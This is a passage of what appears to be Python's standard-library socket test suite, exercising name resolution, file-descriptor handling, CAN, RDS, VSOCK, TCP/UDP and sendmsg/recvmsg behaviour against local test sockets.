sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + str(ifindex), '1234'))
def test_str_for_enums(self):
# Make sure that the AF_* and SOCK_* constants have enum-like string
# reprs.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
self.assertEqual(str(s.family), 'AddressFamily.AF_INET')
self.assertEqual(str(s.type), 'SocketKind.SOCK_STREAM')
def test_socket_consistent_sock_type(self):
SOCK_NONBLOCK = getattr(socket, 'SOCK_NONBLOCK', 0)
SOCK_CLOEXEC = getattr(socket, 'SOCK_CLOEXEC', 0)
sock_type = socket.SOCK_STREAM | SOCK_NONBLOCK | SOCK_CLOEXEC
with socket.socket(socket.AF_INET, sock_type) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(1)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(0)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(True)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(False)
self.assertEqual(s.type, socket.SOCK_STREAM)
@unittest.skipIf(os.name == 'nt', 'Will not work on Windows')
def test_unknown_socket_family_repr(self):
# Test that when created with a family that's not one of the known
# AF_*/SOCK_* constants, socket.family just returns the number.
#
# To do this we fool socket.socket into believing it already has an
# open fd because on this path it doesn't actually verify the family and
# type and populates the socket object.
#
# On Windows this trick won't work, so the test is skipped.
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
unknown_family = max(socket.AddressFamily.__members__.values()) + 1
unknown_type = max(
kind
for name, kind in socket.SocketKind.__members__.items()
if name not in {'SOCK_NONBLOCK', 'SOCK_CLOEXEC'}
) + 1
with socket.socket(
family=unknown_family, type=unknown_type, proto=23,
fileno=fd) as s:
self.assertEqual(s.family, unknown_family)
self.assertEqual(s.type, unknown_type)
# some OS like macOS ignore proto
self.assertIn(s.proto, {0, 23})
@unittest.skipUnless(hasattr(os, 'sendfile'), 'test needs os.sendfile()')
def test__sendfile_use_sendfile(self):
class File:
def __init__(self, fd):
self.fd = fd
def fileno(self):
return self.fd
with socket.socket() as sock:
fd = os.open(os.curdir, os.O_RDONLY)
os.close(fd)
with self.assertRaises(socket._GiveupOnSendfile):
sock._sendfile_use_sendfile(File(fd))
with self.assertRaises(OverflowError):
sock._sendfile_use_sendfile(File(2**1000))
with self.assertRaises(TypeError):
sock._sendfile_use_sendfile(File(None))
def _test_socket_fileno(self, s, family, stype):
self.assertEqual(s.family, family)
self.assertEqual(s.type, stype)
fd = s.fileno()
s2 = socket.socket(fileno=fd)
self.addCleanup(s2.close)
# detach old fd to avoid double close
s.detach()
self.assertEqual(s2.family, family)
self.assertEqual(s2.type, stype)
self.assertEqual(s2.fileno(), fd)
def test_socket_fileno(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((support.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_STREAM)
if hasattr(socket, "SOCK_DGRAM"):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind((support.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_DGRAM)
if support.IPV6_ENABLED:
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((support.HOSTv6, 0, 0, 0))
self._test_socket_fileno(s, socket.AF_INET6, socket.SOCK_STREAM)
if hasattr(socket, "AF_UNIX"):
tmpdir = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, tmpdir)
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind(os.path.join(tmpdir, 'socket'))
self._test_socket_fileno(s, socket.AF_UNIX, socket.SOCK_STREAM)
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class BasicCANTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_RAW
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCMConstants(self):
socket.CAN_BCM
# opcodes
socket.CAN_BCM_TX_SETUP # create (cyclic) transmission task
socket.CAN_BCM_TX_DELETE # remove (cyclic) transmission task
socket.CAN_BCM_TX_READ # read properties of (cyclic) transmission task
socket.CAN_BCM_TX_SEND # send one CAN frame
socket.CAN_BCM_RX_SETUP # create RX content filter subscription
socket.CAN_BCM_RX_DELETE # remove RX content filter subscription
socket.CAN_BCM_RX_READ # read properties of RX content filter subscription
socket.CAN_BCM_TX_STATUS # reply to TX_READ request
socket.CAN_BCM_TX_EXPIRED # notification on performed transmissions (count=0)
socket.CAN_BCM_RX_STATUS # reply to RX_READ request
socket.CAN_BCM_RX_TIMEOUT # cyclic message is absent
socket.CAN_BCM_RX_CHANGED # updated CAN frame (detected content change)
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testCreateBCMSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM) as s:
pass
def testBindAny(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.bind(('', ))
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
self.assertRaisesRegex(OSError, 'interface name too long',
s.bind, ('x' * 1024,))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_LOOPBACK"),
'socket.CAN_RAW_LOOPBACK required for this test.')
def testLoopback(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
for loopback in (0, 1):
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK,
loopback)
self.assertEqual(loopback,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_FILTER"),
'socket.CAN_RAW_FILTER required for this test.')
def testFilter(self):
can_id, can_mask = 0x200, 0x700
can_filter = struct.pack("=II", can_id, can_mask)
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, can_filter)
self.assertEqual(can_filter,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, 8))
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, bytearray(can_filter))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class CANTest(ThreadedCANSocketTest):
def __init__(self, methodName='runTest'):
ThreadedCANSocketTest.__init__(self, methodName=methodName)
@classmethod
def build_can_frame(cls, can_id, data):
"""Build a CAN frame."""
can_dlc = len(data)
data = data.ljust(8, b'\x00')
return struct.pack(cls.can_frame_fmt, can_id, can_dlc, data)
@classmethod
def dissect_can_frame(cls, frame):
"""Dissect a CAN frame."""
can_id, can_dlc, data = struct.unpack(cls.can_frame_fmt, frame)
return (can_id, can_dlc, data[:can_dlc])
def testSendFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
self.assertEqual(addr[0], self.interface)
self.assertEqual(addr[1], socket.AF_CAN)
def _testSendFrame(self):
self.cf = self.build_can_frame(0x00, b'\x01\x02\x03\x04\x05')
self.cli.send(self.cf)
def testSendMaxFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
def _testSendMaxFrame(self):
self.cf = self.build_can_frame(0x00, b'\x07' * 8)
self.cli.send(self.cf)
def testSendMultiFrames(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf1, cf)
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf2, cf)
def _testSendMultiFrames(self):
self.cf1 = self.build_can_frame(0x07, b'\x44\x33\x22\x11')
self.cli.send(self.cf1)
self.cf2 = self.build_can_frame(0x12, b'\x99\x22\x33')
self.cli.send(self.cf2)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def _testBCM(self):
cf, addr = self.cli.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
can_id, can_dlc, data = self.dissect_can_frame(cf)
self.assertEqual(self.can_id, can_id)
self.assertEqual(self.data, data)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCM(self):
bcm = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM)
self.addCleanup(bcm.close)
bcm.connect((self.interface,))
self.can_id = 0x123
self.data = bytes([0xc0, 0xff, 0xee])
self.cf = self.build_can_frame(self.can_id, self.data)
opcode = socket.CAN_BCM_TX_SEND
flags = 0
count = 0
ival1_seconds = ival1_usec = ival2_seconds = ival2_usec = 0
bcm_can_id = 0x0222
nframes = 1
assert len(self.cf) == 16
header = struct.pack(self.bcm_cmd_msg_fmt,
opcode,
flags,
count,
ival1_seconds,
ival1_usec,
ival2_seconds,
ival2_usec,
bcm_can_id,
nframes,
)
header_plus_frame = header + self.cf
bytes_sent = bcm.send(header_plus_frame)
self.assertEqual(bytes_sent, len(header_plus_frame))
@unittest.skipUnless(HAVE_SOCKET_CAN_ISOTP, 'CAN ISOTP required for this test.')
class ISOTPTest(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.interface = "vcan0"
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_ISOTP
socket.SOCK_DGRAM
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_ISOTP"),
'socket.CAN_ISOTP required for this test.')
def testCreateISOTPSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
pass
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
with self.assertRaisesRegex(OSError, 'interface name too long'):
s.bind(('x' * 1024, 1, 2))
def testBind(self):
try:
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
addr = self.interface, 0x123, 0x456
s.bind(addr)
self.assertEqual(s.getsockname(), addr)
except OSError as e:
if e.errno == errno.ENODEV:
self.skipTest('network interface `%s` does not exist' %
self.interface)
else:
raise
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class BasicRDSTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_RDS
socket.PF_RDS
def testCreateSocket(self):
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
pass
def testSocketBufferSize(self):
bufsize = 16384
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, bufsize)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, bufsize)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class RDSTest(ThreadedRDSSocketTest):
def __init__(self, methodName='runTest'):
ThreadedRDSSocketTest.__init__(self, methodName=methodName)
def setUp(self):
super().setUp()
self.evt = threading.Event()
def testSendAndRecv(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
self.assertEqual(self.cli_addr, addr)
def _testSendAndRecv(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testPeek(self):
data, addr = self.serv.recvfrom(self.bufsize, socket.MSG_PEEK)
self.assertEqual(self.data, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testPeek(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
@requireAttrs(socket.socket, 'recvmsg')
def testSendAndRecvMsg(self):
data, ancdata, msg_flags, addr = self.serv.recvmsg(self.bufsize)
self.assertEqual(self.data, data)
@requireAttrs(socket.socket, 'sendmsg')
def _testSendAndRecvMsg(self):
self.data = b'hello ' * 10
self.cli.sendmsg([self.data], (), 0, (HOST, self.port))
def testSendAndRecvMulti(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data1, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data2, data)
def _testSendAndRecvMulti(self):
self.data1 = b'bacon'
self.cli.sendto(self.data1, 0, (HOST, self.port))
self.data2 = b'egg'
self.cli.sendto(self.data2, 0, (HOST, self.port))
def testSelect(self):
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testSelect(self):
self.data = b'select'
self.cli.sendto(self.data, 0, (HOST, self.port))
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
class BasicVSOCKTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_VSOCK
def testVSOCKConstants(self):
socket.SO_VM_SOCKETS_BUFFER_SIZE
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE
socket.VMADDR_CID_ANY
socket.VMADDR_PORT_ANY
socket.VMADDR_CID_HOST
socket.VM_SOCKETS_INVALID_VERSION
socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID
def testCreateSocket(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
pass
def testSocketBufferSize(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
orig_max = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE)
orig = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE)
orig_min = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE, orig_max * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE, orig * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE, orig_min * 2)
self.assertEqual(orig_max * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE))
self.assertEqual(orig * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE))
self.assertEqual(orig_min * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE))
class BasicTCPTest(SocketConnectedTest):
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecv(self):
# Testing large receive over TCP
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.serv_conn.send(MSG)
def testOverFlowRecv(self):
# Testing receive in chunks over TCP
seg1 = self.cli_conn.recv(len(MSG) - 3)
seg2 = self.cli_conn.recv(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecv(self):
self.serv_conn.send(MSG)
def testRecvFrom(self):
# Testing large recvfrom() over TCP
msg, addr = self.cli_conn.recvfrom(1024)
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.serv_conn.send(MSG)
def testOverFlowRecvFrom(self):
# Testing recvfrom() in chunks over TCP
seg1, addr = self.cli_conn.recvfrom(len(MSG)-3)
seg2, addr = self.cli_conn.recvfrom(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecvFrom(self):
self.serv_conn.send(MSG)
def testSendAll(self):
# Testing sendall() with a 2048 byte string over TCP
msg = b''
while 1:
read = self.cli_conn.recv(1024)
if not read:
break
msg += read
self.assertEqual(msg, b'f' * 2048)
def _testSendAll(self):
big_chunk = b'f' * 2048
self.serv_conn.sendall(big_chunk)
def testFromFd(self):
# Testing fromfd()
fd = self.cli_conn.fileno()
sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
self.assertIsInstance(sock, socket.socket)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testFromFd(self):
self.serv_conn.send(MSG)
def testDup(self):
# Testing dup()
sock = self.cli_conn.dup()
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDup(self):
self.serv_conn.send(MSG)
def testShutdown(self):
# Testing shutdown()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
# wait for _testShutdown to finish: on OS X, when the server
# closes the connection the client also becomes disconnected,
# and the client's shutdown call will fail. (Issue #4397.)
self.done.wait()
def _testShutdown(self):
self.serv_conn.send(MSG)
self.serv_conn.shutdown(2)
testShutdown_overflow = support.cpython_only(testShutdown)
@support.cpython_only
def _testShutdown_overflow(self):
import _testcapi
self.serv_conn.send(MSG)
# Issue 15989
self.assertRaises(OverflowError, self.serv_conn.shutdown,
_testcapi.INT_MAX + 1)
self.assertRaises(OverflowError, self.serv_conn.shutdown,
2 + (_testcapi.UINT_MAX + 1))
self.serv_conn.shutdown(2)
def testDetach(self):
# Testing detach()
fileno = self.cli_conn.fileno()
f = self.cli_conn.detach()
self.assertEqual(f, fileno)
# cli_conn cannot be used anymore...
self.assertTrue(self.cli_conn._closed)
self.assertRaises(OSError, self.cli_conn.recv, 1024)
self.cli_conn.close()
# ...but we can create another socket using the (still open)
# file descriptor
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=f)
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDetach(self):
self.serv_conn.send(MSG)
class BasicUDPTest(ThreadedUDPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPSocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
# Testing sendto() and Recv() over UDP
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDP
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
# Tests for the sendmsg()/recvmsg() interface. Where possible, the
# same test code is used with different families and types of socket
# (e.g. stream, datagram), and tests using recvmsg() are repeated
# using recvmsg_into().
#
# The generic test classes such as SendmsgTests and
# RecvmsgGenericTests inherit from SendrecvmsgBase and expect to be
# supplied with sockets cli_sock and serv_sock representing the
# client's and the server's end of the connection respectively, and
# attributes cli_addr and serv_addr holding their (numeric where
# appropriate) addresses.
#
# The final concrete test classes combine these with subclasses of
# SocketTestBase which set up client and server sockets of a specific
# type, and with subclasses of SendrecvmsgBase such as
# SendrecvmsgDgramBase and SendrecvmsgConnectedBase which map these
# sockets to cli_sock and serv_sock and override the methods and
# attributes of SendrecvmsgBase to fill in destination addresses if
# needed when sending, check for specific flags in msg_flags, etc.
#
# RecvmsgIntoMixin provides a version of doRecvmsg() implemented using
# recvmsg_into().
# XXX: like the other datagram (UDP) tests in this module, the code
# here assumes that datagram delivery on the local machine will be
# reliable.
class SendrecvmsgBase(ThreadSafeCleanupTestCase):
# Base class for sendmsg()/recvmsg() tests.
# Time in seconds to wait before considering a test failed, or
# None for no timeout. Not all tests actually set a timeout.
fail_timeout = 3.0
def setUp(self):
self.misc_event = threading.Event()
super().setUp()
def sendToServer(self, msg):
# Send msg to the server.
return self.cli_sock.send(msg)
# Tuple of alternative default arguments for sendmsg() when called
# via sendmsgToServer() (e.g. to include a destination address).
sendmsg_to_server_defaults = ()
def sendmsgToServer(self, *args):
# Call sendmsg() on self.cli_sock with the given arguments,
# filling in any arguments which are not supplied with the
# corresponding items of self.sendmsg_to_server_defaults, if
# any.
return self.cli_sock.sendmsg(
*(args + self.sendmsg_to_server_defaults[len(args):]))
def doRecvmsg(self, sock, bufsize, *args):
# Call recvmsg() on sock with given arguments and return its
# result. Should be used for tests which can use either
# recvmsg() or recvmsg_into() - RecvmsgIntoMixin overrides
# this method with one which emulates it using recvmsg_into(),
# thus allowing the same test to be used for both methods.
result = sock.recvmsg(bufsize, *args)
self.registerRecvmsgResult(result)
return result
def registerRecvmsgResult(self, result):
# Called by doRecvmsg() with the return value of recvmsg() or
# recvmsg_into(). Can be overridden to arrange cleanup based
# on the returned ancillary data, for instance.
pass
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer.
self.assertEqual(addr1, addr2)
# Flags that are normally unset in msg_flags
msg_flags_common_unset = 0
for name in ("MSG_CTRUNC", "MSG_OOB"):
msg_flags_common_unset |= getattr(socket, name, 0)
# Flags that are normally set
msg_flags_common_set = 0
# Flags set when a complete record has been received (e.g. MSG_EOR
# for SCTP)
msg_flags_eor_indicator = 0
# Flags set when a complete record has not been received
# (e.g. MSG_TRUNC for datagram sockets)
msg_flags_non_eor_indicator = 0
def checkFlags(self, flags, eor=None, checkset=0, checkunset=0, ignore=0):
# Method to check the value of msg_flags returned by recvmsg[_into]().
#
# Checks that all bits in msg_flags_common_set attribute are
# set in "flags" and all bits in msg_flags_common_unset are
# unset.
#
# The "eor" argument specifies whether the flags should
# indicate that a full record (or datagram) has been received.
# If "eor" is None, no checks are done; otherwise, checks
# that:
#
# * if "eor" is true, all bits in msg_flags_eor_indicator are
# set and all bits in msg_flags_non_eor_indicator are unset
#
# * if "eor" is false, all bits in msg_flags_non_eor_indicator
# are set and all bits in msg_flags_eor_indicator are unset
#
# If "checkset" and/or "checkunset" are supplied, they require
# the given bits to be set or unset respectively, overriding
# what the attributes require for those bits.
#
# If any bits are set in "ignore", they will not be checked,
# regardless of the other inputs.
#
# Will raise Exception if the inputs require a bit to be both
# set and unset, and it is not ignored.
defaultset = self.msg_flags_common_set
defaultunset = self.msg_flags_common_unset
if eor:
defaultset |= self.msg_flags_eor_indicator
defaultunset |= self.msg_flags_non_eor_indicator
elif eor is not None:
defaultset |= self.msg_flags_non_eor_indicator
defaultunset |= self.msg_flags_eor_indicator
# Function arguments override defaults
defaultset &= ~checkunset
defaultunset &= ~checkset
# Merge arguments with remaining defaults, and check for conflicts
checkset |= defaultset
checkunset |= defaultunset
inboth = checkset & checkunset & ~ignore
if inboth:
raise Exception("contradictory set, unset requirements for flags "
"{0:#x}".format(inboth))
# Compare with given msg_flags value
mask = (checkset | checkunset) & ~ignore
self.assertEqual(flags & mask, checkset & mask)
class RecvmsgIntoMixin(SendrecvmsgBase):
# Mixin to implement doRecvmsg() using recvmsg_into().
def doRecvmsg(self, sock, bufsize, *args):
buf = bytearray(bufsize)
result = sock.recvmsg_into([buf], *args)
self.registerRecvmsgResult(result)
self.assertGreaterEqual(result[0], 0)
self.assertLessEqual(result[0], bufsize)
return (bytes(buf[:result[0]]),) + result[1:]
class SendrecvmsgDgramFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for datagram sockets.
@property
def msg_flags_non_eor_indicator(self):
return super().msg_flags_non_eor_indicator | socket.MSG_TRUNC
class SendrecvmsgSCTPFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for SCTP sockets.
@property
def msg_flags_eor_indicator(self):
return super().msg_flags_eor_indicator | socket.MSG_EOR
class SendrecvmsgConnectionlessBase(SendrecvmsgBase):
# Base class for tests on connectionless-mode sockets. Users must
# supply sockets on attributes cli and serv to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.serv
@property
def cli_sock(self):
return self.cli
@property
def sendmsg_to_server_defaults(self):
return ([], [], 0, self.serv_addr)
def sendToServer(self, msg):
return self.cli_sock.sendto(msg, self.serv_addr)
class SendrecvmsgConnectedBase(SendrecvmsgBase):
# Base class for tests on connected sockets. Users must supply
# sockets on attributes serv_conn and cli_conn (representing the
# connections *to* the server and the client), to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.cli_conn
@property
def cli_sock(self):
return self.serv_conn
def checkRecvmsgAddress(self, addr1, addr2):
# Address is currently "unspecified" for a connected socket,
# so we don't examine it
pass
class SendrecvmsgServerTimeoutBase(SendrecvmsgBase):
# Base class to set a timeout on server's socket.
def setUp(self):
super().setUp()
self.serv_sock.settimeout(self.fail_timeout)
class SendmsgTests(SendrecvmsgServerTimeoutBase):
# Tests for sendmsg() which can use any socket type and do not
# involve recvmsg() or recvmsg_into().
def testSendmsg(self):
# Send a simple message with sendmsg().
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG]), len(MSG))
def testSendmsgDataGenerator(self):
# Send from buffer obtained from a generator (not a sequence).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgDataGenerator(self):
self.assertEqual(self.sendmsgToServer((o for o in [MSG])),
len(MSG))
def testSendmsgAncillaryGenerator(self):
# Gather (empty) ancillary data from a generator.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgAncillaryGenerator(self):
self.assertEqual(self.sendmsgToServer([MSG], (o for o in [])),
len(MSG))
def testSendmsgArray(self):
# Send data from an array instead of the usual bytes object.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgArray(self):
self.assertEqual(self.sendmsgToServer([array.array("B", MSG)]),
len(MSG))
def testSendmsgGather(self):
# Send message data from more than one buffer (gather write).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgGather(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
def testSendmsgBadArgs(self):
# Check that sendmsg() rejects invalid arguments.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadArgs(self):
self.assertRaises(TypeError, self.cli_sock.sendmsg)
self.assertRaises(TypeError, self.sendmsgToServer,
b"not in an iterable")
self.assertRaises(TypeError, self.sendmsgToServer,
object())
self.assertRaises(TypeError, self.sendmsgToServer,
[object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG, object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], 0, object())
self.sendToServer(b"done")
def testSendmsgBadCmsg(self):
# Check that invalid ancillary data items are rejected.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(object(), 0, b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, object(), b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, object())])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0)])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b"data", 42)])
self.sendToServer(b"done")
@requireAttrs(socket, "CMSG_SPACE")
def testSendmsgBadMultiCmsg(self):
# Check that invalid ancillary data items are rejected when
# more than one item is present.
self.assertEqual(self.serv_sock.recv(1000), b"done")
@testSendmsgBadMultiCmsg.client_skip
def _testSendmsgBadMultiCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [0, 0, b""])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b""), object()])
self.sendToServer(b"done")
def testSendmsgExcessCmsgReject(self):
# Check that sendmsg() rejects excess ancillary data items
# when the number that can be sent is limited.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgExcessCmsgReject(self):
if not hasattr(socket, "CMSG_SPACE"):
# Can only send one item
with self.assertRaises(OSError) as cm:
self.sendmsgToServer([MSG], [(0, 0, b""), (0, 0, b"")])
self.assertIsNone(cm.exception.errno)
self.sendToServer(b"done")
def testSendmsgAfterClose(self):
# Check that sendmsg() fails on a closed socket.
pass
def _testSendmsgAfterClose(self):
self.cli_sock.close()
self.assertRaises(OSError, self.sendmsgToServer, [MSG])
class SendmsgStreamTests(SendmsgTests):
# Tests for sendmsg() which require a stream socket and do not
# involve recvmsg() or recvmsg_into().
def testSendmsgExplicitNoneAddr(self):
# Check that peer address can be specified as None.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgExplicitNoneAddr(self):
self.assertEqual(self.sendmsgToServer([MSG], [], 0, None), len(MSG))
def testSendmsgTimeout(self):
# Check that timeout works with sendmsg().
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
def _testSendmsgTimeout(self):
try:
self.cli_sock.settimeout(0.03)
with self.assertRaises(socket.timeout):
while True:
self.sendmsgToServer([b"a"*512])
finally:
self.misc_event.set()
# XXX: would be nice to have more tests for sendmsg flags argument.
# Linux supports MSG_DONTWAIT when sending, but in general, it
# only works when receiving. Could add other platforms if they
# support it too.
